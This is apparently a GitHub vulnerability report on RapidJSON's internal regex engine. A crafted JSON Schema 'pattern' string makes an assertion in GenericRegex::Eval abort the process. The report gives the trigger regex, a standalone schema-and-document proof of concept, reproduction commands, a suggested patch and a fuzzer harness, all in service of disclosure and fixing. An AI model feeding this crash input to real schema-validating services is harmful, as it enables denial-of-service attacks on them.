Assertion Failure in RapidJSON Regex Engine via GenericRegex::Eval causes Process Crash #2373

@OwenSanzas

Description

Summary

RapidJSON's internal regex engine (regex.h) hits an assertion failure in Eval() when processing malformed regular expressions from JSON Schema "pattern" fields. A crafted regex such as ^s(}}}|)}}}}}}}}+ underflows the operand stack, triggering assert(operandStack.GetSize() >= sizeof(Frag) * 2) at regex.h:381 and aborting the process. The bug is exploitable whenever an application validates JSON against untrusted schemas.

Root Cause

GenericRegex::Eval() at regex.h:381 assumes the operand stack has at least 2 Frag entries during alternation (|) processing. The regex compiler does not validate the pattern structure before evaluation. A malformed regex containing nested groups with alternation operators causes the operand stack to underflow, violating the assertion. The compiler accepts syntactically invalid patterns without error, passing them directly to the evaluator.

Vulnerable Code (regex.h:381)

template <typename Encoding, typename Allocator>
bool GenericRegex<Encoding, Allocator>::Eval(
    Stack<Allocator>& operandStack, Operator op) {
  switch (op) {
    // ...
    case kAlternation: {
      // Assumes two operands are available on the stack.
      // RAPIDJSON_ASSERT expands to assert() by default.
      RAPIDJSON_ASSERT(operandStack.GetSize() >= sizeof(Frag) * 2);  // ASSERTION FAILURE
      Frag e2 = *operandStack.template Pop<Frag>(1);
      Frag e1 = *operandStack.template Pop<Frag>(1);
      // ...
    }
    // ...
  }
}
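
The failure mode can be illustrated with a simplified stand-in for the operand stack. This is a minimal sketch, not RapidJSON's code: Frag, OperandStack, and EvalAlternation below are hypothetical simplifications that use std::vector in place of the library's byte-based Stack<Allocator>. It shows a checked variant that reports failure instead of aborting when fewer than two operands are present.

```cpp
#include <cstddef>
#include <vector>

// Hypothetical, simplified fragment. The real Frag tracks NFA state indices.
struct Frag {
    int start;  // entry state of the fragment
    int out;    // dangling exit of the fragment
};

using OperandStack = std::vector<Frag>;

// Combines the top two fragments into a single alternation fragment.
// Returns false and leaves the stack untouched if fewer than two operands
// exist, which is the condition the assertion in Eval() guards.
bool EvalAlternation(OperandStack& operands, int splitState) {
    if (operands.size() < 2) {
        return false;  // malformed pattern: report an error instead of aborting
    }
    Frag e2 = operands.back();
    operands.pop_back();
    Frag e1 = operands.back();
    operands.pop_back();
    (void)e1;  // a real implementation would link splitState to both e1 and e2
    operands.push_back(Frag{splitState, e2.out});
    return true;
}
```

With a single operand on the stack, EvalAlternation returns false and the caller can reject the pattern. With two operands it replaces them with one combined fragment.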

Trigger Pattern

Regex:  ^s(}}}|)}}}}}}}}+

The group "(}}}|)" contains an alternation whose second alternative is empty,
and it is followed by a run of unmatched closing braces. Evaluating this pattern
pops more operands than were pushed, so the stack underflows when the
alternation operator is evaluated.

Vulnerability Description

RapidJSON's internal regex engine, used for JSON Schema "pattern" validation, does not fully validate regular expression syntax before evaluating the pattern. Eval() in GenericRegex processes each operator on the assumption that the operand stack is well-formed, and guards against underflow only with assert(). When a malformed regex such as ^s(}}}|)}}}}}}}}+ arrives through a JSON Schema "pattern" field, the operand stack underflows during alternation processing and the assertion at regex.h:381 fires. Any application that validates JSON documents against untrusted or user-provided JSON Schemas is affected. In a web service that accepts JSON Schema definitions, this becomes a network-exploitable denial of service: the attacker supplies a malicious schema, and any subsequent validation against it crashes the service.
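
Until the library rejects such patterns itself, one possible application-side mitigation is to turn the abort into an exception. RapidJSON allows RAPIDJSON_ASSERT to be defined by the user before its headers are included, and the sketch below shows that shape. To stay self-contained it omits the RapidJSON includes, and PopTwoOperands and CheckSurvives are hypothetical stand-ins for the library's internal check and the application's call site. Whether the library unwinds cleanly when an assertion throws in the middle of regex compilation is an assumption that should be verified before relying on this.

```cpp
#include <cstddef>
#include <stdexcept>

// Must be defined before any RapidJSON header is included.
// Written as an expression so it works wherever the macro is used.
#define RAPIDJSON_ASSERT(x) \
    ((x) ? (void)0 : throw std::logic_error("RapidJSON assertion failed: " #x))

// In a real application the RapidJSON headers would be included here,
// for example: #include <rapidjson/schema.h>

// Hypothetical stand-in for the operand-count check inside the regex engine.
void PopTwoOperands(std::size_t operandCount) {
    RAPIDJSON_ASSERT(operandCount >= 2);
}

// Hypothetical call site: converts the failed assertion into a recoverable
// error so the service can reject the schema instead of crashing.
bool CheckSurvives(std::size_t operandCount) {
    try {
        PopTwoOperands(operandCount);
        return true;
    } catch (const std::logic_error&) {
        return false;
    }
}
```

In this sketch CheckSurvives(1) returns false rather than terminating the process. In a service, the try block would wrap construction of the rapidjson::SchemaDocument from the untrusted schema.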

Severity

Medium (CVSS 5.5)

PoC

Production Reproduction

Production application: workspace/prod_repro/json_schema_validator.cpp, a JSON Schema validation service built on the public rapidjson::SchemaDocument and rapidjson::SchemaValidator APIs.

# Build
clang++ -fsanitize=address -g -O1 -I/path/to/rapidjson/include \
    workspace/prod_repro/json_schema_validator.cpp -o json_schema_validator

# Run with crash input
ASAN_OPTIONS=detect_leaks=0 ./json_schema_validator crash-2d2aae10f939c969030c33c3289f2c4188642165

Standalone Reproduction

Also reproducible with standalone JSON files:

Schema (schema.json):

{"pattern":"^s(}}}|)}}}}}}}}+"}

Document (doc.json):

"hello"

Run:

ASAN_OPTIONS=detect_leaks=0 ./json_schema_validator schema.json doc.json

Sanitizer Output

Note: This is an assert() failure, not a memory error. The program calls abort() directly, so ASAN does not produce a stack trace. The assertion message and the Aborted exit status are the complete output.

json_schema_validator: /usr/include/rapidjson/internal/regex.h:381: bool rapidjson::internal::GenericRegex<rapidjson::UTF8<>>::Eval(Stack<Allocator> &, Operator) [Encoding = rapidjson::UTF8<>, Allocator = rapidjson::CrtAllocator]: Assertion `operandStack.GetSize() >= sizeof(Frag) * 2' failed.
Aborted (exit code 134)
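
The exit code 134 follows the shell convention of 128 plus the signal number, and SIGABRT is signal 6 on Linux. For a test harness that needs to tell this assertion abort apart from an ordinary failure, a minimal POSIX sketch follows. RunAndCheckAbort, AbortingBody, CleanBody, and ShellExitCode are hypothetical helpers, and the child here calls abort() directly in place of running the validator.

```cpp
#include <csignal>
#include <cstdlib>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

// Runs `body` in a forked child and reports whether the child was
// terminated by SIGABRT, which is what a failed assert() raises.
bool RunAndCheckAbort(void (*body)()) {
    pid_t pid = fork();
    if (pid < 0) {
        return false;  // fork failed, nothing was run
    }
    if (pid == 0) {
        body();
        _exit(0);  // child finished without aborting
    }
    int status = 0;
    if (waitpid(pid, &status, 0) != pid) {
        return false;
    }
    return WIFSIGNALED(status) && WTERMSIG(status) == SIGABRT;
}

// Stand-in for a validator run that hits the assertion.
void AbortingBody() { std::abort(); }

// Stand-in for a validator run that completes normally.
void CleanBody() {}

// Exit code a shell reports for a process killed by the given signal.
int ShellExitCode(int signalNumber) { return 128 + signalNumber; }
```

A harness built this way can classify the crash input as an assertion abort without parsing the error text.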

Suggested Fix

--- a/include/rapidjson/internal/regex.h
+++ b/include/rapidjson/internal/regex.h
@@ -378,7 +378,8 @@ bool GenericRegex<Encoding, Allocator>::Eval(
   case kAlternation: {
-    RAPIDJSON_ASSERT(operandStack.GetSize() >= sizeof(Frag) * 2);
+    if (operandStack.GetSize() < sizeof(Frag) * 2)
+      return false;  // Reject malformed regex instead of asserting
     Frag e2 = *operandStack.template Pop<Frag>(1);

Fuzzer Source Code

// rj_schema_fuzzer.cc — Fuzz rapidjson SchemaValidator
#include <cstdint>
#include <cstddef>
#include <string>
#include <rapidjson/document.h>
#include <rapidjson/schema.h>
#include <rapidjson/stringbuffer.h>
#include <rapidjson/error/en.h>

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    if (size < 4) return 0;
    size_t split = size / 2;
    const std::string schema_str(reinterpret_cast<const char*>(data), split);
    const std::string doc_str(reinterpret_cast<const char*>(data + split), size - split);

    rapidjson::Document schema_doc;
    if (schema_doc.Parse(schema_str.c_str()).HasParseError()) return 0;
    if (!schema_doc.IsObject()) return 0;

    rapidjson::SchemaDocument schema(schema_doc);
    rapidjson::Document doc;
    if (doc.Parse(doc_str.c_str()).HasParseError()) return 0;

    rapidjson::SchemaValidator validator(schema);
    if (!doc.Accept(validator)) {
        rapidjson::StringBuffer sb;
        validator.GetInvalidSchemaPointer().StringifyUriFragment(sb);
        (void)sb.GetString();
        sb.Clear();
        (void)validator.GetInvalidSchemaKeyword();
        validator.GetInvalidDocumentPointer().StringifyUriFragment(sb);
        (void)sb.GetString();
    }
    validator.Reset();
    doc.Accept(validator);
    return 0;
}
